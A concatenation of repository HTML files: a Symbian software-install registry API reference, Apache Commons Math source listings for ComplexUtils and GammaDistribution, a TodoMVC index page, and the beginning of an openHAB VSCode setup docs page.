&amp;)const </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-1BBE1448-1DF8-33C4-BF9E-5A5F427AEE35.html"> RSubSessionBase::SendReceive(TInt,const TIpcArgs &amp;,TRequestStatus &amp;)const </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-1BBE1448-1DF8-33C4-BF9E-5A5F427AEE35.html"> RSubSessionBase::Session()const </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-1BBE1448-1DF8-33C4-BF9E-5A5F427AEE35.html"> RSubSessionBase::SubSessionHandle()const </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::AugmentationsL(RPointerArray&lt; CSisRegistryPackage &gt; &amp;) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::AugmentationsL(RPointerArray&lt; HBufC &gt; &amp;,RPointerArray&lt; HBufC &gt; &amp;) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::AugmentationsNumberL() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::CertificateChainsL(RPointerArray&lt; HBufC8 &gt; &amp;) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::Close() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::ControllersL(RPointerArray&lt; HBufC8 &gt; &amp;) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::DependenciesL(RPointerArray&lt; CSisRegistryDependency &gt; &amp;) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::DependentPackagesL(RPointerArray&lt; CSisRegistryPackage &gt; &amp;) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::EmbeddedPackagesL(RPointerArray&lt; CSisRegistryPackage &gt; &amp;) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::EmbeddingPackagesL(RPointerArray&lt; CSisRegistryPackage &gt; &amp;) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::FilesL(RPointerArray&lt; HBufC &gt; &amp;) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::HashL(const TDesC &amp;) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::InstalledDrivesL() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::IsAugmentationL() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::IsDeletablePreInstalledL() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::IsInRomL() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::IsPresentL() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::IsSignedBySuCertL() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::IsSignedL() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::LanguageL() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::LocalizedVendorNameL() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::Open(RSisRegistrySession &amp;,TUid) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::Open(RSisRegistrySession &amp;,const TDesC &amp;,const TDesC &amp;) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::OpenL(RSisRegistrySession &amp;,const CSisRegistryPackage &amp;) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::PackageL() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::PackageNameL() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::PreInstalledL() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::PropertyL(TInt) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::RegistryFilesL(RPointerArray&lt; HBufC &gt; &amp;) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::RemovableL() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::RemoveWithLastDependentL() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::SendReceiveBufferLC(TInt) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::SendReceiveBufferLC(TInt,const TDesC &amp;) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::SetRemoveWithLastDependentL(TUid) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::ShutdownAllAppsL() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::SidsL(RArray&lt; TUid &gt; &amp;) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::SizeL() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::TrustL()const </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::TrustStatusL() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::TrustTimeStampL()const </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::UidL() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::UniqueVendorNameL() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::VerifyControllerSignatureL(RPointerArray&lt; CX509Certificate &gt; &amp;) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::VerifyControllerSignatureL(RPointerArray&lt; CX509Certificate &gt; &amp;,TBool) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry::VersionL() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-C7180AE5-C8A8-3135-8C2C-78DF739EE8BE.html"> Swi::RSisRegistryWritableEntry::FileDescriptionsL(RPointerArray&lt; CSisRegistryFileDescription &gt; &amp;) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-C7180AE5-C8A8-3135-8C2C-78DF739EE8BE.html"> Swi::RSisRegistryWritableEntry::GetMatchingSupportedLanguagesL(RArray&lt; TLanguage &gt; &amp;) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-C7180AE5-C8A8-3135-8C2C-78DF739EE8BE.html"> Swi::RSisRegistryWritableEntry::InstallTypeL() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-C7180AE5-C8A8-3135-8C2C-78DF739EE8BE.html"> Swi::RSisRegistryWritableEntry::SelectedDriveL() </a> </td> </tr> </tbody> </table> </div> <h1 class="pageHeading topictitle1"> Member Functions Documentation </h1> <div class="nested1" id="GUID-2B2FE7A5-6C44-34CA-A8D8-20D147A740B3"> <a name="GUID-2B2FE7A5-6C44-34CA-A8D8-20D147A740B3"> <!-- --> </a> <h2 class="topictitle2"> CancelRevocationStatusL() </h2> <table class="signature"> <tr> <td> IMPORT_C void </td> <td> CancelRevocationStatusL </td> <td> ( </td> <td> ) </td> <td> </td> </tr> </table> <div class="section"> <div> <p> Cancel current asnchronous RevocationStatus request </p> <div class="p"> <dl class="user"> <dt class="dlterm"> <strong> capability </strong> </dt> <dd> WriteUserData </dd> </dl> <dl class="user"> <dt class="dlterm"> <strong> capability </strong> </dt> <dd> NetworkServices </dd> </dl> </div> </div> </div> </div> <div class="nested1" id="GUID-6D2256E1-E710-363C-8A79-0A3859A70600"> <a name="GUID-6D2256E1-E710-363C-8A79-0A3859A70600"> <!-- --> </a> <h2 class="topictitle2"> CheckRevocationStatus(const TDesC8 &amp;, TRequestStatus &amp;) </h2> <table class="signature"> <tr> <td> IMPORT_C void </td> <td> CheckRevocationStatus </td> <td> ( </td> <td> const <a href="GUID-FB97E0A3-352A-316F-97C6-69E4741A8120.html"> TDesC8 </a> &amp; </td> <td> aOcspUri, </td> </tr> <tr> <td colspan="3"> </td> <td> <a href="GUID-E0B34F3E-D4C4-3232-B8B1-7DB35B454646.html"> TRequestStatus </a> &amp; </td> <td> aStatus </td> </tr> <tr> <td colspan="2"> </td> <td> ) </td> <td colspan="2"> </td> </tr> </table> <div class="section"> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> const <a href="GUID-FB97E0A3-352A-316F-97C6-69E4741A8120.html"> TDesC8 </a> &amp; aOcspUri </td> <td> </td> </tr> <tr class="bg"> <td class="parameter"> <a href="GUID-E0B34F3E-D4C4-3232-B8B1-7DB35B454646.html"> TRequestStatus </a> &amp; aStatus </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-750B086B-7C5C-31AD-A914-FCA1F8097DBD"> <a name="GUID-750B086B-7C5C-31AD-A914-FCA1F8097DBD"> <!-- --> </a> <h2 class="topictitle2"> CheckRevocationStatusL(const TDesC8 &amp;) </h2> <table class="signature"> <tr> <td> IMPORT_C void </td> <td> CheckRevocationStatusL </td> <td> ( </td> <td> const <a href="GUID-FB97E0A3-352A-316F-97C6-69E4741A8120.html"> TDesC8 </a> &amp; </td> <td> aOcspUri </td> <td> ) </td> <td> </td> </tr> </table> <div class="section"> <div> <p> Synchronous call for a revocation status check for the package identified by the UID. The trust status will be updated as a result of this call. Use <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html#GUID-DE2278F3-8FB3-36F8-B6F0-D94934B93A43"> RSisRegistryEntry::TrustStatusL </a> to view the result. </p> <div class="p"> <dl class="user"> <dt class="dlterm"> <strong> capability </strong> </dt> <dd> WriteUserData </dd> </dl> <dl class="user"> <dt class="dlterm"> <strong> capability </strong> </dt> <dd> NetworkServices </dd> </dl> </div> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> const <a href="GUID-FB97E0A3-352A-316F-97C6-69E4741A8120.html"> TDesC8 </a> &amp; aOcspUri </td> <td> The Ocsp resource to be used to check the revocation status </td> </tr> </table> </div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
klapersuite.analysis.Rmc/lib/commons-math-2.2/docs/apidocs/src-html/org/apache/commons/math/complex/ComplexUtils.html
aciancone/klapersuite
<HTML> <BODY BGCOLOR="white"> <PRE> <FONT color="green">001</FONT> /*<a name="line.1"></a> <FONT color="green">002</FONT> * Licensed to the Apache Software Foundation (ASF) under one or more<a name="line.2"></a> <FONT color="green">003</FONT> * contributor license agreements. See the NOTICE file distributed with<a name="line.3"></a> <FONT color="green">004</FONT> * this work for additional information regarding copyright ownership.<a name="line.4"></a> <FONT color="green">005</FONT> * The ASF licenses this file to You under the Apache License, Version 2.0<a name="line.5"></a> <FONT color="green">006</FONT> * (the "License"); you may not use this file except in compliance with<a name="line.6"></a> <FONT color="green">007</FONT> * the License. You may obtain a copy of the License at<a name="line.7"></a> <FONT color="green">008</FONT> *<a name="line.8"></a> <FONT color="green">009</FONT> * http://www.apache.org/licenses/LICENSE-2.0<a name="line.9"></a> <FONT color="green">010</FONT> *<a name="line.10"></a> <FONT color="green">011</FONT> * Unless required by applicable law or agreed to in writing, software<a name="line.11"></a> <FONT color="green">012</FONT> * distributed under the License is distributed on an "AS IS" BASIS,<a name="line.12"></a> <FONT color="green">013</FONT> * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.<a name="line.13"></a> <FONT color="green">014</FONT> * See the License for the specific language governing permissions and<a name="line.14"></a> <FONT color="green">015</FONT> * limitations under the License.<a name="line.15"></a> <FONT color="green">016</FONT> */<a name="line.16"></a> <FONT color="green">017</FONT> <a name="line.17"></a> <FONT color="green">018</FONT> package org.apache.commons.math.complex;<a name="line.18"></a> <FONT color="green">019</FONT> <a name="line.19"></a> <FONT color="green">020</FONT> import org.apache.commons.math.MathRuntimeException;<a name="line.20"></a> <FONT color="green">021</FONT> import org.apache.commons.math.exception.util.LocalizedFormats;<a name="line.21"></a> <FONT color="green">022</FONT> import org.apache.commons.math.util.FastMath;<a name="line.22"></a> <FONT color="green">023</FONT> <a name="line.23"></a> <FONT color="green">024</FONT> /**<a name="line.24"></a> <FONT color="green">025</FONT> * Static implementations of common<a name="line.25"></a> <FONT color="green">026</FONT> * {@link org.apache.commons.math.complex.Complex} utilities functions.<a name="line.26"></a> <FONT color="green">027</FONT> *<a name="line.27"></a> <FONT color="green">028</FONT> * @version $Revision: 990655 $ $Date: 2010-08-29 23:49:40 +0200 (dim. 29 ao??t 2010) $<a name="line.28"></a> <FONT color="green">029</FONT> */<a name="line.29"></a> <FONT color="green">030</FONT> public class ComplexUtils {<a name="line.30"></a> <FONT color="green">031</FONT> <a name="line.31"></a> <FONT color="green">032</FONT> /**<a name="line.32"></a> <FONT color="green">033</FONT> * Default constructor.<a name="line.33"></a> <FONT color="green">034</FONT> */<a name="line.34"></a> <FONT color="green">035</FONT> private ComplexUtils() {<a name="line.35"></a> <FONT color="green">036</FONT> super();<a name="line.36"></a> <FONT color="green">037</FONT> }<a name="line.37"></a> <FONT color="green">038</FONT> <a name="line.38"></a> <FONT color="green">039</FONT> /**<a name="line.39"></a> <FONT color="green">040</FONT> * Creates a complex number from the given polar representation.<a name="line.40"></a> <FONT color="green">041</FONT> * &lt;p&gt;<a name="line.41"></a> <FONT color="green">042</FONT> * The value returned is &lt;code&gt;r&amp;middot;e&lt;sup&gt;i&amp;middot;theta&lt;/sup&gt;&lt;/code&gt;,<a name="line.42"></a> <FONT color="green">043</FONT> * computed as &lt;code&gt;r&amp;middot;cos(theta) + r&amp;middot;sin(theta)i&lt;/code&gt;&lt;/p&gt;<a name="line.43"></a> <FONT color="green">044</FONT> * &lt;p&gt;<a name="line.44"></a> <FONT color="green">045</FONT> * If either &lt;code&gt;r&lt;/code&gt; or &lt;code&gt;theta&lt;/code&gt; is NaN, or<a name="line.45"></a> <FONT color="green">046</FONT> * &lt;code&gt;theta&lt;/code&gt; is infinite, {@link Complex#NaN} is returned.&lt;/p&gt;<a name="line.46"></a> <FONT color="green">047</FONT> * &lt;p&gt;<a name="line.47"></a> <FONT color="green">048</FONT> * If &lt;code&gt;r&lt;/code&gt; is infinite and &lt;code&gt;theta&lt;/code&gt; is finite,<a name="line.48"></a> <FONT color="green">049</FONT> * infinite or NaN values may be returned in parts of the result, following<a name="line.49"></a> <FONT color="green">050</FONT> * the rules for double arithmetic.&lt;pre&gt;<a name="line.50"></a> <FONT color="green">051</FONT> * Examples:<a name="line.51"></a> <FONT color="green">052</FONT> * &lt;code&gt;<a name="line.52"></a> <FONT color="green">053</FONT> * polar2Complex(INFINITY, &amp;pi;/4) = INFINITY + INFINITY i<a name="line.53"></a> <FONT color="green">054</FONT> * polar2Complex(INFINITY, 0) = INFINITY + NaN i<a name="line.54"></a> <FONT color="green">055</FONT> * polar2Complex(INFINITY, -&amp;pi;/4) = INFINITY - INFINITY i<a name="line.55"></a> <FONT color="green">056</FONT> * polar2Complex(INFINITY, 5&amp;pi;/4) = -INFINITY - INFINITY i &lt;/code&gt;&lt;/pre&gt;&lt;/p&gt;<a name="line.56"></a> <FONT color="green">057</FONT> *<a name="line.57"></a> <FONT color="green">058</FONT> * @param r the modulus of the complex number to create<a name="line.58"></a> <FONT color="green">059</FONT> * @param theta the argument of the complex number to create<a name="line.59"></a> <FONT color="green">060</FONT> * @return &lt;code&gt;r&amp;middot;e&lt;sup&gt;i&amp;middot;theta&lt;/sup&gt;&lt;/code&gt;<a name="line.60"></a> <FONT color="green">061</FONT> * @throws IllegalArgumentException if r is negative<a name="line.61"></a> <FONT color="green">062</FONT> * @since 1.1<a name="line.62"></a> <FONT color="green">063</FONT> */<a name="line.63"></a> <FONT color="green">064</FONT> public static Complex polar2Complex(double r, double theta) {<a name="line.64"></a> <FONT color="green">065</FONT> if (r &lt; 0) {<a name="line.65"></a> <FONT color="green">066</FONT> throw MathRuntimeException.createIllegalArgumentException(<a name="line.66"></a> <FONT color="green">067</FONT> LocalizedFormats.NEGATIVE_COMPLEX_MODULE, r);<a name="line.67"></a> <FONT color="green">068</FONT> }<a name="line.68"></a> <FONT color="green">069</FONT> return new Complex(r * FastMath.cos(theta), r * FastMath.sin(theta));<a name="line.69"></a> <FONT color="green">070</FONT> }<a name="line.70"></a> <FONT color="green">071</FONT> <a name="line.71"></a> <FONT color="green">072</FONT> }<a name="line.72"></a> </PRE> </BODY> </HTML>
out/public/index.html
phperret/cjone-todomvc
<!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]--><!DOCTYPE html> <!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8" lang="en"> <![endif]--><!DOCTYPE html> <!--[if IE 8]> <html class="no-js lt-ie9" lang="en"> <![endif]--><!DOCTYPE html> <!--[if gt IE 8]><!--><!DOCTYPE html> <html lang="en" class="no-js"> <!--<![endif]--> <head> <meta charset="utf-8" /> <meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible" /> <title>ClojureScriptOne • TodoMVC</title> <link href="css/one.css" rel="stylesheet" /> <link href="../assets/base.css" rel="stylesheet" /> <!-- CSS overrides - remove if you don't need it --> <link href="css/app.css" rel="stylesheet" /> <!--[if IE]> <script src="../assets/ie.js"></script> <![endif]--> <!-- Le HTML5 shim, for IE6-8 support of HTML elements --> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <!-- Le styles --> <link type="image/x-icon" rel="shortcut icon" href="favicon.ico" /> <link rel="stylesheet" href="assets/base.css" /> <!-- <link href="css/two.css" rel="stylesheet"> --> <style type="text/css"> body { padding-top: 60px; } </style> <!-- Le fav and touch icons --> <link href="images/favicon.ico" rel="shortcut icon" /> <!-- Add xpath support to IE. Domina needs this --> <!--[if IE]> <script type="text/javascript" src="js/xpath.js"></script> <![endif]--> </head> <body> <div class="topbar"> <div class="navbar-inner"> <div class="container"> <a href="./index.html" class="brand">TodoMVC - Made with ClojureScriptOne MVC and Enfocus.</a> <div class="nav-collapse collapse"> </div> </div> </div> </div> <div id="container"> <div id="content"></div> <div id="options"></div> <footer></footer> </div> <!-- scripts concatenated and minified via ant build script--> <!-- end scripts--> <script src="javascripts/mainp.js" type="text/javascript"></script><script type="text/javascript">one.todomvc.core.start();</script></body> </html>
klapersuite.analysis.Rmc/lib/commons-math-2.2/docs/apidocs/src-html/org/apache/commons/math/distribution/GammaDistribution.html
aciancone/klapersuite
<HTML> <BODY BGCOLOR="white"> <PRE> <FONT color="green">001</FONT> /*<a name="line.1"></a> <FONT color="green">002</FONT> * Licensed to the Apache Software Foundation (ASF) under one or more<a name="line.2"></a> <FONT color="green">003</FONT> * contributor license agreements. See the NOTICE file distributed with<a name="line.3"></a> <FONT color="green">004</FONT> * this work for additional information regarding copyright ownership.<a name="line.4"></a> <FONT color="green">005</FONT> * The ASF licenses this file to You under the Apache License, Version 2.0<a name="line.5"></a> <FONT color="green">006</FONT> * (the "License"); you may not use this file except in compliance with<a name="line.6"></a> <FONT color="green">007</FONT> * the License. You may obtain a copy of the License at<a name="line.7"></a> <FONT color="green">008</FONT> *<a name="line.8"></a> <FONT color="green">009</FONT> * http://www.apache.org/licenses/LICENSE-2.0<a name="line.9"></a> <FONT color="green">010</FONT> *<a name="line.10"></a> <FONT color="green">011</FONT> * Unless required by applicable law or agreed to in writing, software<a name="line.11"></a> <FONT color="green">012</FONT> * distributed under the License is distributed on an "AS IS" BASIS,<a name="line.12"></a> <FONT color="green">013</FONT> * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.<a name="line.13"></a> <FONT color="green">014</FONT> * See the License for the specific language governing permissions and<a name="line.14"></a> <FONT color="green">015</FONT> * limitations under the License.<a name="line.15"></a> <FONT color="green">016</FONT> */<a name="line.16"></a> <FONT color="green">017</FONT> package org.apache.commons.math.distribution;<a name="line.17"></a> <FONT color="green">018</FONT> <a name="line.18"></a> <FONT color="green">019</FONT> /**<a name="line.19"></a> <FONT color="green">020</FONT> * The Gamma Distribution.<a name="line.20"></a> <FONT color="green">021</FONT> *<a name="line.21"></a> <FONT color="green">022</FONT> * &lt;p&gt;<a name="line.22"></a> <FONT color="green">023</FONT> * References:<a name="line.23"></a> <FONT color="green">024</FONT> * &lt;ul&gt;<a name="line.24"></a> <FONT color="green">025</FONT> * &lt;li&gt;&lt;a href="http://mathworld.wolfram.com/GammaDistribution.html"&gt;<a name="line.25"></a> <FONT color="green">026</FONT> * Gamma Distribution&lt;/a&gt;&lt;/li&gt;<a name="line.26"></a> <FONT color="green">027</FONT> * &lt;/ul&gt;<a name="line.27"></a> <FONT color="green">028</FONT> * &lt;/p&gt;<a name="line.28"></a> <FONT color="green">029</FONT> *<a name="line.29"></a> <FONT color="green">030</FONT> * @version $Revision: 920852 $ $Date: 2010-03-09 13:53:44 +0100 (mar. 09 mars 2010) $<a name="line.30"></a> <FONT color="green">031</FONT> */<a name="line.31"></a> <FONT color="green">032</FONT> public interface GammaDistribution extends ContinuousDistribution, HasDensity&lt;Double&gt; {<a name="line.32"></a> <FONT color="green">033</FONT> /**<a name="line.33"></a> <FONT color="green">034</FONT> * Modify the shape parameter, alpha.<a name="line.34"></a> <FONT color="green">035</FONT> * @param alpha the new shape parameter.<a name="line.35"></a> <FONT color="green">036</FONT> * @deprecated as of v2.1<a name="line.36"></a> <FONT color="green">037</FONT> */<a name="line.37"></a> <FONT color="green">038</FONT> @Deprecated<a name="line.38"></a> <FONT color="green">039</FONT> void setAlpha(double alpha);<a name="line.39"></a> <FONT color="green">040</FONT> <a name="line.40"></a> <FONT color="green">041</FONT> /**<a name="line.41"></a> <FONT color="green">042</FONT> * Access the shape parameter, alpha<a name="line.42"></a> <FONT color="green">043</FONT> * @return alpha.<a name="line.43"></a> <FONT color="green">044</FONT> */<a name="line.44"></a> <FONT color="green">045</FONT> double getAlpha();<a name="line.45"></a> <FONT color="green">046</FONT> <a name="line.46"></a> <FONT color="green">047</FONT> /**<a name="line.47"></a> <FONT color="green">048</FONT> * Modify the scale parameter, beta.<a name="line.48"></a> <FONT color="green">049</FONT> * @param beta the new scale parameter.<a name="line.49"></a> <FONT color="green">050</FONT> * @deprecated as of v2.1<a name="line.50"></a> <FONT color="green">051</FONT> */<a name="line.51"></a> <FONT color="green">052</FONT> @Deprecated<a name="line.52"></a> <FONT color="green">053</FONT> void setBeta(double beta);<a name="line.53"></a> <FONT color="green">054</FONT> <a name="line.54"></a> <FONT color="green">055</FONT> /**<a name="line.55"></a> <FONT color="green">056</FONT> * Access the scale parameter, beta<a name="line.56"></a> <FONT color="green">057</FONT> * @return beta.<a name="line.57"></a> <FONT color="green">058</FONT> */<a name="line.58"></a> <FONT color="green">059</FONT> double getBeta();<a name="line.59"></a> <FONT color="green">060</FONT> <a name="line.60"></a> <FONT color="green">061</FONT> /**<a name="line.61"></a> <FONT color="green">062</FONT> * Return the probability density for a particular point.<a name="line.62"></a> <FONT color="green">063</FONT> * @param x The point at which the density should be computed.<a name="line.63"></a> <FONT color="green">064</FONT> * @return The pdf at point x.<a name="line.64"></a> <FONT color="green">065</FONT> */<a name="line.65"></a> <FONT color="green">066</FONT> double density(Double x);<a name="line.66"></a> <FONT color="green">067</FONT> }<a name="line.67"></a> </PRE> </BODY> </HTML>
docs/Getting Started/VS Code.html
steve-bate/openhab2-jython
<!DOCTYPE html> <!--[if IE 8]><html class="no-js lt-ie9" lang="en" > <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en" > <!--<![endif]--> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Setting up VSCode &mdash; openHAB Helper Libraries documentation</title> <script type="text/javascript" src="../_static/js/modernizr.min.js"></script> <script type="text/javascript" id="documentation_options" data-url_root="../" src="../_static/documentation_options.js"></script> <script type="text/javascript" src="../_static/jquery.js"></script> <script type="text/javascript" src="../_static/underscore.js"></script> <script type="text/javascript" src="../_static/doctools.js"></script> <script type="text/javascript" src="../_static/language_data.js"></script> <script type="text/javascript" src="../_static/js/theme.js"></script> <link href="https://fonts.googleapis.com/css?family=Lato:400,400i,700,700i&display=swap" rel="stylesheet"> <link href="https://fonts.googleapis.com/css?family=Roboto+Slab:400,700&display=swap" rel="stylesheet"> <link rel="stylesheet" href="../_static/css/theme.css" type="text/css" /> <link rel="stylesheet" href="../_static/pygments.css" type="text/css" /> <link rel="index" title="Index" href="../genindex.html" /> <link rel="search" title="Search" href="../search.html" /> <link rel="next" title="Rules" href="../Guides/Rules.html" /> <link rel="prev" title="First Steps" href="First Steps.html" /> </head> <body class="wy-body-for-nav"> <div class="wy-grid-for-nav"> <nav data-toggle="wy-nav-shift" class="wy-nav-side"> <div class="wy-side-scroll"> <div class="wy-side-nav-search" > <a href="../index.html" class="icon icon-home"> openHAB Helper Libraries </a> <div class="version"> latest </div> <div role="search"> <form id="rtd-search-form" class="wy-form" action="../search.html" method="get"> <input type="text" name="q" placeholder="Search docs" /> <input type="hidden" name="check_keywords" value="yes" /> <input type="hidden" name="area" value="default" /> </form> </div> </div> <div class="wy-menu wy-menu-vertical" data-spy="affix" role="navigation" aria-label="main navigation"> <p class="caption"><span class="caption-text">Getting Started</span></p> <ul class="current"> <li class="toctree-l1"><a class="reference internal" href="Installation.html">Installation</a></li> <li class="toctree-l1"><a class="reference internal" href="File Locations.html">File Locations</a></li> <li class="toctree-l1"><a class="reference internal" href="First Steps.html">First Steps</a></li> <li class="toctree-l1 current"><a class="current reference internal" href="#">Setting up VSCode</a><ul> <li class="toctree-l2"><a class="reference internal" href="#env-file">ENV File</a></li> <li class="toctree-l2"><a class="reference internal" href="#exclude-helper-libraries">Exclude Helper Libraries</a></li> <li class="toctree-l2"><a class="reference internal" href="#pylint-directives">pylint Directives</a></li> </ul> </li> </ul> <p class="caption"><span class="caption-text">Guides</span></p> <ul> 